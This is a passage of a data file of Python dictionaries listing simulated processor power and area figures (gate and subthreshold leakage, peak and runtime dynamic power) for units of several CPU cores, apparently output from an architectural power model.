'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.773479,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.76805,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.25717,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000743737,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000743737,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000646759,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000249805,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00251669,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00465092,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00716787,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.168419,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.389567,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.572027,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.14183,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.098595,
'L2/Runtime Dynamic': 0.0212693,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.41252,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.5062,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.167436,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.167436,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.20641,
'Load Store Unit/Runtime Dynamic': 3.49938,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.41287,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.825739,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.146529,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.147985,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0639356,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.811814,
'Memory Management Unit/Runtime Dynamic': 0.211921,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 30.4658,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.21018,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0479776,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.315686,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.57384,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.7054,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.136084,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.309574,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.797652,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.251785,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.40612,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.204996,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.862902,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.165679,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.5166,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.150694,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.010561,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.124765,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0781051,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.275459,
'Execution Unit/Register Files/Runtime Dynamic': 0.0886661,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296874,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.691131,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.35765,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000376894,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000376894,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000329837,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00012854,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00112199,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00220561,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00355779,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0750845,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.77602,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178011,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.255021,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.22632,
'Instruction Fetch Unit/Runtime Dynamic': 0.513879,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.045595,
'L2/Runtime Dynamic': 0.00877062,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.58398,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.13583,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0759266,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0759266,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.94252,
'Load Store Unit/Runtime Dynamic': 1.5862,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.187222,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.374444,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0664457,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0671173,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.296955,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0292213,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.567206,
'Memory Management Unit/Runtime Dynamic': 0.0963386,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 20.8877,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.396406,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.016184,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.120258,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.532848,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.09569,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.179236,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.343469,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.997388,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.308416,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.497463,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.251103,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.05698,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199824,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.95449,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.188428,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0129363,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.159451,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0956722,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.347879,
'Execution Unit/Register Files/Runtime Dynamic': 0.108609,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
